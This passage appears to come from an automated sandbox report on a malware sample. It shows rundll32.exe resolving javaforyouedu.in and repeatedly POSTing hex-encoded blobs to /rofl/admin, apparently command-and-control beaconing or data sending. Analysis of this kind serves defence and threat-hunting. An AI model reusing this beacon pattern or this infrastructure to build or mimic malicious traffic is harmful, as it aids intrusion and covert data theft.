Aug 28, 2024 13:41:50.192969084 CEST	443	49767	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:50.193182945 CEST	49767	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:50.193218946 CEST	49767	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:50.193265915 CEST	49767	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:50.193295002 CEST	443	49767	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:50.215239048 CEST	443	49768	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:50.215305090 CEST	49768	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:50.215348959 CEST	443	49768	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:50.215400934 CEST	49768	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:50.215497017 CEST	49768	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:50.215500116 CEST	443	49768	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:50.215543985 CEST	443	49768	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:50.215553999 CEST	49768	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:50.215595961 CEST	49768	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:59.873104095 CEST	49769	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:59.873138905 CEST	443	49769	43.206.237.192	192.168.2.4
Aug 28, 2024 13:41:59.873219013 CEST	49769	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:59.873476028 CEST	49769	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:41:59.873486996 CEST	443	49769	43.206.237.192	192.168.2.4
Aug 28, 2024 13:42:00.679550886 CEST	443	49769	43.206.237.192	192.168.2.4
Aug 28, 2024 13:42:00.682044029 CEST	49769	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:42:00.682941914 CEST	49769	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:42:00.682954073 CEST	443	49769	43.206.237.192	192.168.2.4
Aug 28, 2024 13:42:00.684415102 CEST	49769	443	192.168.2.4	43.206.237.192
Aug 28, 2024 13:42:00.684420109 CEST	443	49769	43.206.237.192	192.168.2.4
Aug 28, 2024 13:42:01.121143103 CEST	443	49769	43.206.237.192	192.168.2.4
Aug 28, 2024 13:42:01.121200085 CEST	443	49769	43.206.237.192	192.168.2.4
Aug 28, 2024 13:42:01.121272087 CEST	49769	443	192.168.2.4	43.206.237.192

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 28, 2024 13:37:57.760030985 CEST	53366	53	192.168.2.4	1.1.1.1
Aug 28, 2024 13:37:57.771446943 CEST	53	53366	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 28, 2024 13:37:57.760030985 CEST	192.168.2.4	1.1.1.1	0x5aa8	Standard query (0)	javaforyouedu.in	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 28, 2024 13:37:57.771446943 CEST	1.1.1.1	192.168.2.4	0x5aa8	No error (0)	javaforyouedu.in		43.206.237.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

javaforyouedu.in

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	43.206.237.192	443	7372	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:37:58 UTC	251	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 538 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:37:58 UTC	538	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 61 31 37 65 35 63 61 62 39 66 62 36 37 34 37 65 35 63 65 34 64 64 66 62 33 63 32 37 37 61 66 39 62 33 36 35 33 64 66 63 38 65 37 38 34 32 61 36 64 31 39 36 37 31 65 64 30 65 61 35 35 34 39 64 38 39 64 61 35 32 61 33 39 65 61 66 32 65 32 37 30 63 61 35 38 63 35 64 65 65 35 65 37 30 62 33 35 66 66 34 30 34 33 37 63 30 36 35 65 62 36 63 36 62 34 61 63 63 39 39 39 30 65 65 33 66 64 30 62 66 66 30 36 39 31 39 66 64 36 61 36 62 39 64 36 37 63 30 66 30 38 63 38 34 39 39 37 35 34 63 66 34 64 31 39 62 36 65 65 61 66 34 32 34 61 35 37 33 65 63 36 38 65 37 36 63 31 38 32 31 64 30 33 65 66 39 62 35 61 34 63 66 65 61 31 64 31 30 35 39 61 66 63 64 34 35 38 38 33 35 63 34 37 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8a17e5cab9fb6747e5ce4ddfb3c277af9b3653dfc8e7842a6d19671ed0ea5549d89da52a39eaf2e270ca58c5dee5e70b35ff40437c065eb6c6b4acc9990ee3fd0bff06919fd6a6b9d67c0f08c8499754cf4d19b6eeaf424a573ec68e76c1821d03ef9b5a4cfea1d1059afcd458835c47
2024-08-28 11:37:59 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:37:59 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:37:59 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	43.206.237.192	443	7396	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:37:58 UTC	251	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 538 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:37:58 UTC	538	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 61 31 37 65 35 63 61 62 39 66 62 36 37 34 37 65 35 63 65 34 64 64 66 62 33 63 32 37 37 61 66 39 62 33 36 35 33 64 66 63 38 65 37 38 34 32 61 36 64 31 39 36 37 31 65 64 30 65 61 35 35 34 39 64 38 39 64 61 35 32 61 33 39 65 61 66 32 65 32 37 30 63 61 35 38 63 35 64 65 65 35 65 37 30 62 33 35 66 66 34 30 34 33 37 63 30 36 35 65 62 36 63 36 62 34 61 63 63 39 39 39 30 65 65 33 66 64 30 62 66 66 30 36 39 31 39 66 64 36 61 36 62 39 64 36 37 63 30 66 30 38 63 38 34 39 39 37 35 34 63 66 34 64 31 39 62 36 65 65 61 66 34 32 34 61 35 37 33 65 63 36 38 65 37 36 63 31 38 32 31 64 30 33 65 66 39 62 35 61 34 63 66 65 61 31 64 31 30 35 39 61 66 63 64 34 35 38 38 33 35 63 34 37 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8a17e5cab9fb6747e5ce4ddfb3c277af9b3653dfc8e7842a6d19671ed0ea5549d89da52a39eaf2e270ca58c5dee5e70b35ff40437c065eb6c6b4acc9990ee3fd0bff06919fd6a6b9d67c0f08c8499754cf4d19b6eeaf424a573ec68e76c1821d03ef9b5a4cfea1d1059afcd458835c47
2024-08-28 11:37:59 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:37:58 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:37:59 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	43.206.237.192	443	7372	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:37:59 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:37:59 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:38:00 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:38:00 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:38:00 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	43.206.237.192	443	7396	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:37:59 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:37:59 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:38:00 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:38:00 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:38:00 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:38:01 UTC	251	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 538 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:38:01 UTC	538	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 61 31 37 65 35 63 61 62 39 66 62 36 37 34 37 65 35 63 65 34 64 64 66 62 33 63 32 37 37 61 66 39 62 33 36 35 33 64 66 63 38 65 37 38 34 32 61 36 64 31 39 36 37 31 65 64 30 65 61 35 35 34 39 64 38 39 64 61 35 32 61 33 39 65 61 66 32 65 32 37 30 63 61 35 38 63 35 64 65 65 35 65 37 30 62 33 35 66 66 34 30 34 33 37 63 30 36 35 65 62 36 63 36 62 34 61 63 63 39 39 39 30 65 65 33 66 64 30 62 66 66 30 36 39 31 39 66 64 36 61 36 62 39 64 36 37 63 30 66 30 38 63 38 34 39 39 37 35 34 63 66 34 64 31 39 62 36 65 65 61 66 34 32 34 61 35 37 33 65 63 36 38 65 37 36 63 31 38 32 31 64 30 33 65 66 39 62 35 61 34 63 66 65 61 31 64 31 30 35 39 61 66 63 64 34 35 38 38 33 35 63 34 37 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8a17e5cab9fb6747e5ce4ddfb3c277af9b3653dfc8e7842a6d19671ed0ea5549d89da52a39eaf2e270ca58c5dee5e70b35ff40437c065eb6c6b4acc9990ee3fd0bff06919fd6a6b9d67c0f08c8499754cf4d19b6eeaf424a573ec68e76c1821d03ef9b5a4cfea1d1059afcd458835c47
2024-08-28 11:38:01 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:38:01 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:38:01 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:38:02 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:38:02 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:38:03 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:38:03 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:38:03 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:38:24 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:38:24 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:38:24 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:38:24 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:38:24 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	43.206.237.192	443	7396	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:38:30 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:38:30 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:38:31 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:38:31 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:38:31 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49743	43.206.237.192	443	7372	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:38:30 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:38:30 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:38:31 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:38:31 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:38:31 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:38:37 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:38:37 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:38:37 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:38:37 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:38:37 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:39:00 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:39:00 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:39:00 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:39:00 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:39:00 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	43.206.237.192	443	7396	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:39:01 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:39:01 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:39:02 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:39:02 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:39:02 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	43.206.237.192	443	7372	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:39:02 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:39:02 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:39:02 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:39:02 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:39:02 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49750	43.206.237.192	443	7500	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:39:16 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:39:16 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:39:17 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:39:16 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:39:17 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49751	43.206.237.192	443	7396	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:39:32 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:39:32 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:39:32 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:39:32 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:39:32 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	43.206.237.192	443	7372	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 11:39:32 UTC	250	OUT	POST /rofl/admin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Host: javaforyouedu.in Content-Length: 96 Connection: Keep-Alive Cache-Control: no-cache
2024-08-28 11:39:32 UTC	96	OUT	Data Raw: 37 37 65 66 36 30 38 39 66 61 63 39 34 65 64 39 61 65 38 35 36 62 39 34 35 33 30 61 31 38 61 38 64 35 35 35 31 37 39 64 61 34 34 36 66 32 36 36 34 63 38 65 66 33 65 36 34 61 37 30 34 37 39 61 61 62 36 33 33 33 62 64 38 62 36 37 34 66 62 63 64 31 39 36 32 38 65 64 31 62 38 37 33 37 66 36 Data Ascii: 77ef6089fac94ed9ae856b94530a18a8d555179da446f2664c8ef3e64a70479aab6333bd8b674fbcd19628ed1b8737f6
2024-08-28 11:39:32 UTC	168	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 11:39:32 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 14 Content-Type: text/plain; charset=utf-8 Connection: close
2024-08-28 11:39:32 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
